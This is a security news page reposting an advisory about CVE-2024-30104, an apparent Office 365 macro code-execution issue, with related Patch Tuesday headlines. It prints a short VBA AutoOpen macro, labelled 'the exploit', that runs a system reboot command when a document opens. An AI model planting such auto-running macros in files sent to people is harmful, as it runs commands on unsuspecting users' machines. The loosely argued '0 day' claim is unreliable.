Security
Headlines
HeadlinesLatestCVEs

Headline

Microsoft Office 265 Remote Code Execution

Microsoft Office 365 appears susceptible to macro code execution that can result in remote code execution.

Packet Storm
#vulnerability#mac#microsoft#rce
### [CVE-2024-30104](https://attackerkb.com/contributors/nu11secur1ty)The problem is still in the "docx" files this vulnerability is a 0 daybased on the Follina exploit. The Microsoft company still doesn't wantto understand, that they MUST remove macros options from the 365Office and their offline app. In this video, you will see an exampleof this, how some users can be trickery to open the malicious filethat is sent to them by the attacker. After execution of the file, thething will be very bad for the users who execute it on their computer.It depends of the scenario.### The exploit:```vbsSub AutoOpen()Dim Program As StringDim TaskID As DoubleOn Error Resume NextProgram = "shutdown /R"TaskID = Shell(Program, 1)If Err <> 0 ThenMsgBox "Can't start " & ProgramEnd IfEnd Sub```- Enjoy watching### PoC:[video](https://www.patreon.com/posts/cve-2024-30104-107163015)

Related news

Critical MSMQ RCE Bug Opens Microsoft Servers to Complete Takeover

CVE-2024-30080 is the only critical issue in Microsoft's June 2024 Patch Tuesday update, but many others require prompt attention as well.

Patch Tuesday, June 2024 “Recall” Edition

Microsoft today released updates to fix more than 50 security vulnerabilities in Windows and related software, a relatively light Patch Tuesday this month for Windows administrators. The software giant also responded to a torrent of negative feedback on a new feature of Redmond's flagship operating system that constantly takes screenshots of whatever users are doing on their computers, saying the feature would no longer be enabled by default.

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution